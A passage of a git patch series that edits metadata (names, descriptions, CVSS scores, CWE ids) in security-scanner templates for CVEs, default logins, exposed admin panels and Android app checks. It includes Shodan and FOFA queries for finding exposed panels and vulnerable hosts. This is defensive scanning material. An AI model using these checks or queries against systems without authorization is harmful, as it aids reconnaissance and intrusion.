b/cves/2017/CVE-2017-16894.yaml index 650062c496..9c463d6a03 100644 --- a/cves/2017/CVE-2017-16894.yaml +++ b/cves/2017/CVE-2017-16894.yaml @@ -1,7 +1,7 @@ id: CVE-2017-16894 info: - name: Laravel <5.5.21 - Infomation Disclosure + name: Laravel <5.5.21 - Information Disclosure author: j4vaovo severity: high description: | diff --git a/cves/2022/CVE-2022-0776.yaml b/cves/2022/CVE-2022-0776.yaml index e1d0a14ba5..ea676cd011 100644 --- a/cves/2022/CVE-2022-0776.yaml +++ b/cves/2022/CVE-2022-0776.yaml @@ -3,7 +3,7 @@ id: CVE-2022-0776 info: name: RevealJS postMessage <4.3.0 - Cross-Site Scripting author: LogicalHunter - severity: high + severity: medium description: RevealJS postMessage before 4.3.0 contains a cross-site scripting vulnerability via the document object model. reference: - https://hackerone.com/reports/691977 @@ -11,10 +11,10 @@ info: - https://huntr.dev/bounties/be2b7ee4-f487-42e1-874a-6bcc410e4001/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0776 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-80 cve-id: CVE-2022-0776 - cwe-id: CWE-79 - cvss-score: 6.1 tags: hackerone,huntr,cve,cve2022,headless,postmessage,revealjs headless: diff --git a/exposed-panels/axway-securetransport-webclient.yaml b/exposed-panels/axway-securetransport-webclient.yaml index 0710ef5b10..cf916660f3 100644 --- a/exposed-panels/axway-securetransport-webclient.yaml +++ b/exposed-panels/axway-securetransport-webclient.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: verified: true - google-dork: intitle:"ST Web Client" + google-query: intitle:"ST Web Client" tags: panel,axway,securetransport,webclient requests: diff --git a/exposed-panels/jboss/jboss-jbpm-admin.yaml b/exposed-panels/jboss/jboss-jbpm-admin.yaml index c758d3a235..0f2c7323a1 100644 --- a/exposed-panels/jboss/jboss-jbpm-admin.yaml +++ b/exposed-panels/jboss/jboss-jbpm-admin.yaml @@ -4,7 +4,7 @@ info: name: JBoss jBPM Administration Console Login Panel - Detect author: DhiyaneshDK severity: info - description: JBoss jBPM Administration Console login panel was detected. + description: JBoss jBPM Administration Console login panel was detected. reference: - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/JBossjBPMAdminConsole.java classification: From f53e62967e55bab85504c9b6b7af8e63c96b9c4a Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Wed, 26 Apr 2023 13:17:17 -0400 Subject: [PATCH 065/609] Enhancement: default-logins/nagios/nagiosxi-default-login.yaml by cs --- default-logins/nagios/nagiosxi-default-login.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/default-logins/nagios/nagiosxi-default-login.yaml b/default-logins/nagios/nagiosxi-default-login.yaml index 23dc9dfca0..09246eabcf 100644 --- a/default-logins/nagios/nagiosxi-default-login.yaml +++ b/default-logins/nagios/nagiosxi-default-login.yaml @@ -8,9 +8,9 @@ info: reference: - https://nagiosxi.demos.nagios.com/nagiosxi/login.php?redirect=/nagiosxi/index.php%3f&noauth=1 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.1 - cwe-id: CWE-522 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-1391 metadata: verified: "true" shodan-query: title:"Nagios XI" @@ -68,4 +68,4 @@ requests: - 'name="nsp" value="(.*)">' internal: true -# Enhanced by md on 2023/04/20 +# Enhanced by cs on 2023/04/26 From c59ea2cd02405b61a2483111ca2ddcdc585e6635 Mon Sep 17 00:00:00 2001 From: sullo Date: Wed, 26 Apr 2023 13:32:02 -0400 Subject: [PATCH 066/609] Manual enhancements due to appsmith issues --- cves/2018/CVE-2018-8715.yaml | 9 ++++++--- cves/2023/CVE-2023-24737.yaml | 14 ++++++++------ exposed-panels/fatpipe-mpvpn-panel.yaml | 13 +++++++++++-- exposed-panels/fatpipe-warp-panel.yaml | 13 +++++++++++-- exposed-panels/kenesto-login.yaml | 13 +++++++++++-- exposed-panels/opengear-panel.yaml | 3 ++- 6 files changed, 49 insertions(+), 16 deletions(-) diff --git a/cves/2018/CVE-2018-8715.yaml b/cves/2018/CVE-2018-8715.yaml index c395c9e28c..58a8d22f7b 100644 --- a/cves/2018/CVE-2018-8715.yaml +++ b/cves/2018/CVE-2018-8715.yaml @@ -1,7 +1,7 @@ id: CVE-2018-8715 info: - name: AppWeb Authentication Bypass vulnerability + name: AppWeb - Authentication Bypass author: milo2012 severity: high description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types. @@ -9,11 +9,12 @@ info: - https://github.com/embedthis/appweb/issues/610 - https://blogs.securiteam.com/index.php/archives/3676 - https://security.paloaltonetworks.com/CVE-2018-8715 + - https://nvd.nist.gov/vuln/detail/CVE-2018-8715 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 + cwe-id: CWE-1391 cve-id: CVE-2018-8715 - cwe-id: CWE-287 tags: cve,cve2018,appweb,auth-bypass requests: @@ -33,3 +34,5 @@ requests: words: - '' part: body + +# Enhanced by cs 04/25/2023 diff --git a/cves/2023/CVE-2023-24737.yaml b/cves/2023/CVE-2023-24737.yaml index 7bba298d0b..4f072b0eb0 100644 --- a/cves/2023/CVE-2023-24737.yaml +++ b/cves/2023/CVE-2023-24737.yaml @@ -1,20 +1,20 @@ id: CVE-2023-24737 info: - name: PMB v7.4.6 - Cross Site Scripting + name: PMB v7.4.6 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | - PMB v7.4.6 allows an attacker to make a Reflected XSS on export_z3950.php endpoint via the same query parameter. + PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter. reference: - https://github.com/AetherBlack/CVE/blob/main/PMB/readme.md - - https://nvd.nist.gov/vuln/detail/CVE-2023-24737 - https://github.com/AetherBlack/CVE/tree/main/PMB + - https://nvd.nist.gov/vuln/detail/CVE-2023-24737 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-80 cve-id: CVE-2023-24737 - cwe-id: CWE-79 metadata: shodan-query: http.favicon.hash:1469328760 verified: "true" @@ -41,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by cs 04/25/2023 diff --git a/exposed-panels/fatpipe-mpvpn-panel.yaml b/exposed-panels/fatpipe-mpvpn-panel.yaml index 8b9f880a49..50bf74a0b1 100644 --- a/exposed-panels/fatpipe-mpvpn-panel.yaml +++ b/exposed-panels/fatpipe-mpvpn-panel.yaml @@ -1,10 +1,17 @@ id: fatpipe-mpvpn-panel info: - name: FatPipe MPVPN Panel Detect + name: FatPipe MPVPN - Panel Detect author: princechaddha severity: info - tags: tech,fatpipe + description: The admin panel of the FatPipe MPVPN has been discovered. + tags: tech,fatpipe,panel + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + reference: + - https://www.fatpipeinc.com/products/mpvpn/index.php requests: - method: GET @@ -29,3 +36,5 @@ requests: group: 1 regex: - '
([0-9.a-z]+)<\/h5>' + +# Enhanced by cs 04/25/2023 diff --git a/exposed-panels/fatpipe-warp-panel.yaml b/exposed-panels/fatpipe-warp-panel.yaml index 7c6f45091b..8fd4626d9b 100644 --- a/exposed-panels/fatpipe-warp-panel.yaml +++ b/exposed-panels/fatpipe-warp-panel.yaml @@ -1,10 +1,17 @@ id: fatpipe-warp-panel info: - name: FatPipe WARP Panel Detect + name: FatPipe WARP - Panel Detect author: princechaddha severity: info - tags: tech,fatpipe + description: the FatPipe WARP administration panel was discovered. + tags: tech,fatpipe,panel + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + reference: + - https://www.fatpipeinc.com/products/warp/index.php requests: - method: GET @@ -29,3 +36,5 @@ requests: group: 1 regex: - '
([0-9.a-z]+)<\/h5>' + +# Enhanced by cs 04/25/20223 diff --git a/exposed-panels/kenesto-login.yaml b/exposed-panels/kenesto-login.yaml index 70a5940c3b..e92107bd12 100644 --- a/exposed-panels/kenesto-login.yaml +++ b/exposed-panels/kenesto-login.yaml @@ -1,12 +1,19 @@ id: kenesto-login info: - name: Kenesto Login Detect + name: Kenesto - Login Detect author: pussycat0x severity: info + description: Kenesto login panel was discovered. metadata: fofa-query: 'app="kenesto"' - tags: login,tech,kenesto + tags: login,tech,kenesto,panel + reference: + - https://www.kenesto.com/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 requests: - method: GET @@ -24,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by cs 04/25/2023 diff --git a/exposed-panels/opengear-panel.yaml b/exposed-panels/opengear-panel.yaml index 9230f01266..86c7ba3335 100644 --- a/exposed-panels/opengear-panel.yaml +++ b/exposed-panels/opengear-panel.yaml @@ -4,6 +4,7 @@ info: name: Opengear Management Console Login Panel - Detect author: ffffffff0x,daffainfo severity: info + description: The Opengear Management Console admin panel has been discovered. reference: https://opengear.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N @@ -33,4 +34,4 @@ requests: status: - 200 -# Enhnanced by cs 2023/01/09 +# Enhanced by cs 2023/01/09 From a70a09b447be448bc38a40a25fc2aaf95225eefe Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 28 Apr 2023 12:36:50 +0530 Subject: [PATCH 067/609] name & description - Update --- http/exposed-panels/hashicorp-consul-agent.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/hashicorp-consul-agent.yaml b/http/exposed-panels/hashicorp-consul-agent.yaml index 437332b597..379f6ba518 100644 --- a/http/exposed-panels/hashicorp-consul-agent.yaml +++ b/http/exposed-panels/hashicorp-consul-agent.yaml @@ -1,10 +1,10 @@ id: hashicorp-consul-agent info: - name: Hashicorp Consul Panel - Detect + name: Hashicorp Consul Agent - Detect author: c-sh0 severity: info - description: Hashicorp Consul panel was detected. + description: Hashicorp Consul Agent was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 From 966c648a0e1e2b37b62d335430dade82a4de1af4 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 28 Apr 2023 12:41:51 +0530 Subject: [PATCH 068/609] Update kraken-cluster-monitoring.yaml --- http/exposed-panels/kraken-cluster-monitoring.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/kraken-cluster-monitoring.yaml b/http/exposed-panels/kraken-cluster-monitoring.yaml index 4f595fc1e3..f4ba863c39 100644 --- a/http/exposed-panels/kraken-cluster-monitoring.yaml +++ b/http/exposed-panels/kraken-cluster-monitoring.yaml @@ -1,10 +1,10 @@ id: kraken-cluster-monitoring info: - name: Kraken Cluster Monitoring Panel- Detect + name: Kraken Cluster Monitoring Dashboard - Detect author: pussycat0x severity: info - description: Kraken Cluster Monitoring panel was detected. + description: Kraken Cluster Monitoring Dashboard was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 From 0d7c52b1342db8537c8faf65ab7a6bcdf206cf35 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 12:55:11 -0400 Subject: [PATCH 069/609] Enhancement: file/android/biometric-detect.yaml by md --- file/android/biometric-detect.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/file/android/biometric-detect.yaml b/file/android/biometric-detect.yaml index 002dcf825a..4a3985d108 100644 --- a/file/android/biometric-detect.yaml +++ b/file/android/biometric-detect.yaml @@ -1,9 +1,14 @@ id: biometric-detect info: - name: Biometric or Fingerprint detect + name: Android Biometric/Fingerprint - Detect author: gaurang severity: info + description: Android Biometric/Fingerprint functionality was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: android,file file: @@ -14,4 +19,6 @@ file: - type: word words: - "android.permission.USE_FINGERPRINT" - - "android.permission.USE_BIOMETRIC" \ No newline at end of file + - "android.permission.USE_BIOMETRIC" + +# Enhanced by md on 2023/05/02 From 26c9bef9c89915cab4b22b5e687b3c259f2312ca Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 12:56:14 -0400 Subject: [PATCH 070/609] Enhancement: file/android/certificate-validation.yaml by md --- file/android/certificate-validation.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/file/android/certificate-validation.yaml b/file/android/certificate-validation.yaml index 64a9fecc52..620835a1ff 100644 --- a/file/android/certificate-validation.yaml +++ b/file/android/certificate-validation.yaml @@ -1,9 +1,14 @@ id: improper-certificate-validation info: - name: Improper Certificate Validation + name: Android Improper Certificate Validation - Detect author: gaurang severity: medium + description: Android improper certificate validation was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: android,file file: @@ -13,4 +18,6 @@ file: matchers: - type: word words: - - "Landroid/webkit/SslErrorHandler;->proceed()V" \ No newline at end of file + - "Landroid/webkit/SslErrorHandler;->proceed()V" + +# Enhanced by md on 2023/05/02 From 30bc813599368c1cc1aecdefe545bd3e81d3bce6 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 13:03:04 -0400 Subject: [PATCH 072/609] Enhancement: file/android/content-scheme.yaml by md --- file/android/content-scheme.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/file/android/content-scheme.yaml b/file/android/content-scheme.yaml index f60d6a6607..d153174f81 100644 --- a/file/android/content-scheme.yaml +++ b/file/android/content-scheme.yaml @@ -1,9 +1,14 @@ id: content-scheme info: - name: Content Scheme Enabled + name: Android Content Scheme Enabling - Detect author: gaurang severity: info + description: Android content scheme enabling was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: android,file file: @@ -13,4 +18,6 @@ file: matchers: - type: word words: - - "android:scheme=\"content\"" \ No newline at end of file + - "android:scheme=\"content\"" + +# Enhanced by md on 2023/05/02 From 6484b42e1bf7e10747e7277f8840644d12f4fd74 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 13:03:38 -0400 Subject: [PATCH 073/609] Enhancement: file/android/debug-enabled.yaml by md --- file/android/debug-enabled.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/file/android/debug-enabled.yaml b/file/android/debug-enabled.yaml index 1825b7d030..9a9ed0c47e 100644 --- a/file/android/debug-enabled.yaml +++ b/file/android/debug-enabled.yaml @@ -1,9 +1,14 @@ id: android-debug-enabled info: - name: Android Debug Enabled + name: Android Debug Enabling - Detect author: gaurang severity: low + description: Android debug enabling was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: android,file file: @@ -13,4 +18,6 @@ file: matchers: - type: regex regex: - - "android:debuggable=\"true\"" \ No newline at end of file + - "android:debuggable=\"true\"" + +# Enhanced by md on 2023/05/02 From d7417b75092071779185ce8d90f4e7654e7fbf9e Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 13:15:47 -0400 Subject: [PATCH 074/609] Enhancement: file/android/deep-link-detect.yaml by md --- file/android/deep-link-detect.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/file/android/deep-link-detect.yaml b/file/android/deep-link-detect.yaml index 7d9e1893ef..250b961040 100644 --- a/file/android/deep-link-detect.yaml +++ b/file/android/deep-link-detect.yaml @@ -1,13 +1,18 @@ id: deep-link-detect info: - name: Deep Link Detection + name: Android Deep Link - Detect author: Hardik-Solanki severity: info + description: Android deep link functionality was detected. reference: - https://developer.android.com/training/app-links/deep-linking - https://www.geeksforgeeks.org/deep-linking-in-android-with-example/ - https://medium.com/@muratcanbur/intro-to-deep-linking-on-android-1b9fe9e38abd + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: "true" tags: android,file,deeplink @@ -24,3 +29,5 @@ file: - "android:host" - "android:name" condition: and + +# Enhanced by md on 2023/05/02 From ce6abcbf9e83eb13521df1065d308b694af4b1e1 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 13:20:19 -0400 Subject: [PATCH 075/609] Enhancement: file/android/dynamic-broadcast-receiver.yaml by md --- file/android/dynamic-broadcast-receiver.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/file/android/dynamic-broadcast-receiver.yaml b/file/android/dynamic-broadcast-receiver.yaml index d2ea9a6123..579a9e1972 100644 --- a/file/android/dynamic-broadcast-receiver.yaml +++ b/file/android/dynamic-broadcast-receiver.yaml @@ -1,9 +1,14 @@ id: dynamic-registered-broadcast-receiver info: - name: Dynamic Registered Broadcast Receiver + name: Android Dynamic Broadcast Receiver Register - Detect author: gaurang severity: info + description: Android dynamic broadcast receiver register functionality was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: android,file file: @@ -13,4 +18,6 @@ file: matchers: - type: word words: - - ";->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)" \ No newline at end of file + - ";->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)" + +# Enhanced by md on 2023/05/02 From f567cc5f8890f9f18ecae1f64ffc1b49baeb6a65 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 13:20:57 -0400 Subject: [PATCH 076/609] Enhancement: file/android/file-scheme.yaml by md --- file/android/file-scheme.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/file/android/file-scheme.yaml b/file/android/file-scheme.yaml index e7f14543f8..431810e444 100644 --- a/file/android/file-scheme.yaml +++ b/file/android/file-scheme.yaml @@ -1,9 +1,14 @@ id: file-scheme info: - name: File Scheme Enabled + name: Android File Scheme Enabling - Detect author: gaurang severity: info + description: Android file scheme enabling was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: android,file file: @@ -13,4 +18,6 @@ file: matchers: - type: word words: - - "android:scheme=\"file\"" \ No newline at end of file + - "android:scheme=\"file\"" + +# Enhanced by md on 2023/05/02 From 00ab72f43453e023fc539d893140b40631f6ddce Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 13:21:45 -0400 Subject: [PATCH 077/609] Enhancement: file/android/provider-path.yaml by md --- file/android/provider-path.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/file/android/provider-path.yaml b/file/android/provider-path.yaml index ed4810852d..a37f76685d 100644 --- a/file/android/provider-path.yaml +++ b/file/android/provider-path.yaml @@ -1,9 +1,14 @@ id: insecure-provider-path info: - name: Insecure Provider Path + name: Android Insecure Provider Path - Detect author: gaurang severity: medium + description: Android insecure provider path was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 tags: android,file file: @@ -15,3 +20,5 @@ file: regex: - "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\".\"" - "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\"\"" + +# Enhanced by md on 2023/05/02 From 1f822d9857d8aa88b2dfa48bdd0f09533505e131 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 13:22:07 -0400 Subject: [PATCH 078/609] Enhancement: file/android/certificate-validation.yaml by md --- file/android/certificate-validation.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/file/android/certificate-validation.yaml b/file/android/certificate-validation.yaml index 620835a1ff..54e69a8bbf 100644 --- a/file/android/certificate-validation.yaml +++ b/file/android/certificate-validation.yaml @@ -6,8 +6,8 @@ info: severity: medium description: Android improper certificate validation was detected. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 cwe-id: CWE-200 tags: android,file From f02ba3cdafdc78495bc7ad6221f3198a127fbad0 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 13:30:47 -0400 Subject: [PATCH 079/609] Enhancement: file/android/webview-addjavascript-interface.yaml by md --- file/android/webview-addjavascript-interface.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/file/android/webview-addjavascript-interface.yaml b/file/android/webview-addjavascript-interface.yaml index 06e26a26dd..d21f9e80f2 100644 --- a/file/android/webview-addjavascript-interface.yaml +++ b/file/android/webview-addjavascript-interface.yaml @@ -1,9 +1,14 @@ id: webview-addjavascript-interface info: - name: Webview addJavascript Interface Usage + name: Android WebView Add Javascript Interface - Detect author: gaurang severity: info + description: Android WebView Add Javascript interface usage was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 tags: android,file file: @@ -13,4 +18,6 @@ file: matchers: - type: word words: - - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V" \ No newline at end of file + - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V" + +# Enhanced by md on 2023/05/02 From cca2ad35a01fa719dfb9dd036a51e1a610e750a5 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 13:32:09 -0400 Subject: [PATCH 080/609] Enhancement: file/android/biometric-detect.yaml by md --- file/android/biometric-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/android/biometric-detect.yaml b/file/android/biometric-detect.yaml index 4a3985d108..3240cd15e4 100644 --- a/file/android/biometric-detect.yaml +++ b/file/android/biometric-detect.yaml @@ -4,7 +4,7 @@ info: name: Android Biometric/Fingerprint - Detect author: gaurang severity: info - description: Android Biometric/Fingerprint functionality was detected. + description: Android Biometric/Fingerprint permission files were detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 From 93792d071b4e6b273fa17a53739ca954d25018f4 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 13:33:18 -0400 Subject: [PATCH 081/609] Enhancement: file/android/webview-javascript.yaml by md --- file/android/webview-javascript.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/file/android/webview-javascript.yaml b/file/android/webview-javascript.yaml index 34f4b7bfc1..fee5047e9e 100644 --- a/file/android/webview-javascript.yaml +++ b/file/android/webview-javascript.yaml @@ -1,9 +1,14 @@ id: webview-javascript-enabled info: - name: Webview JavaScript enabled + name: WebView JavaScript Enable - Detect author: gaurang severity: info + description: WebView Javascript enabling was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: android,file,javascript file: @@ -14,3 +19,5 @@ file: - type: word words: - "Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V" + +# Enhanced by md on 2023/05/02 From da0ba6b071a927706702b0c9984dba16ad11e45e Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 13:48:09 -0400 Subject: [PATCH 082/609] Enhancement: file/android/webview-load-url.yaml by md --- file/android/webview-load-url.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/file/android/webview-load-url.yaml b/file/android/webview-load-url.yaml index d258156df2..b387b25a8d 100644 --- a/file/android/webview-load-url.yaml +++ b/file/android/webview-load-url.yaml @@ -1,9 +1,14 @@ id: webview-load-url info: - name: Webview loadUrl usage + name: WebView loadUrl - Detect author: gaurang severity: info + description: WebView loadUrl usage was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: android,file file: @@ -13,4 +18,6 @@ file: matchers: - type: word words: - - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V" \ No newline at end of file + - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V" + +# Enhanced by md on 2023/05/02 From 0ea8440d8789f6a31b1d7063c94ebf6062ce98a3 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 13:49:01 -0400 Subject: [PATCH 083/609] Enhancement: file/android/debug-enabled.yaml by md --- file/android/debug-enabled.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/file/android/debug-enabled.yaml b/file/android/debug-enabled.yaml index 9a9ed0c47e..f2a2340fe4 100644 --- a/file/android/debug-enabled.yaml +++ b/file/android/debug-enabled.yaml @@ -5,11 +5,6 @@ info: author: gaurang severity: low description: Android debug enabling was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 - tags: android,file file: - extensions: From dce88746cc7ebb6b2e4ef05d1948da7d1b46f933 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 13:53:43 -0400 Subject: [PATCH 084/609] Enhancement: file/android/webview-universal-access.yaml by md --- file/android/webview-universal-access.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/file/android/webview-universal-access.yaml b/file/android/webview-universal-access.yaml index 56fe5fb8ac..63d3d3dd76 100644 --- a/file/android/webview-universal-access.yaml +++ b/file/android/webview-universal-access.yaml @@ -1,9 +1,14 @@ id: webview-universal-access info: - name: Webview Universal Access enabled + name: Android WebView Universal Access Enable - Detect author: gaurang severity: medium + description: Android WebView Universal Access enabling was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 tags: android,file file: @@ -13,4 +18,6 @@ file: matchers: - type: word words: - - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" \ No newline at end of file + - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" + +# Enhanced by md on 2023/05/02 From e2e3717b1bd6db0be73d2d95ae6aa6f9b4d08bd2 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 2 May 2023 13:57:20 -0400 Subject: [PATCH 085/609] Enhancement: file/audit/cisco/configure-aaa-service.yaml by md --- file/audit/cisco/configure-aaa-service.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) 